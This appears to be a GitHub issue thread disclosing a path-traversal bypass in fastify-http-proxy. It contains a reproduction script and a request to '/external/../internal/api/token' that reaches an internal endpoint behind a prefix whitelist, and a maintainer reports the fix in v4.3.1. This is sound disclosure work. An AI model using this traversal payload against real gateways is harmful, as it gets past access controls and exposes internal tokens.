API whitelisting behind gateway

[artur-ma]

This is not a real security breach I guess, but some companies rely on api-gateways to whitelist their APIs that are exposed to the world.

For example, I would like to expose only those APIs that have /external prefix

'use strict'

const Fastify = require('fastify')

const target = Fastify({
  logger: false
})

const server = Fastify({
  logger: false
})

target.get('/internal/api/token', (request, reply) => {
  reply.send('Security token: 123')
})

target.get('/external/api/v1', (request, reply) => {
  reply.send('hello world')
})

const proxy = require('fastify-http-proxy')

server.register(proxy, {
  upstream: 'http://localhost:3001',
  prefix: '/external',
  rewritePrefix: '/external',
})


target.listen(3001, (err) => {
  if (err) {
    throw err
  }

  server.listen(3000, (err) => {
    if (err) {
      throw err
    }
  })
})

then execute this snippet(does not work with cURL for some reason):

URL: 'http://127.0.0.1:3000/external/../internal/api/token

var request = require('request');
request.get('http://127.0.0.1:3000/external/../internal/api/token', function (error, response) {
  if (error) throw new Error(error);
  console.log(response.body);
});

will result:

$ node req.js 
Security token: 123

[mcollina]

We are working on this and a fix will be published soon.

[mcollina]

This was fixed in v4.3.1.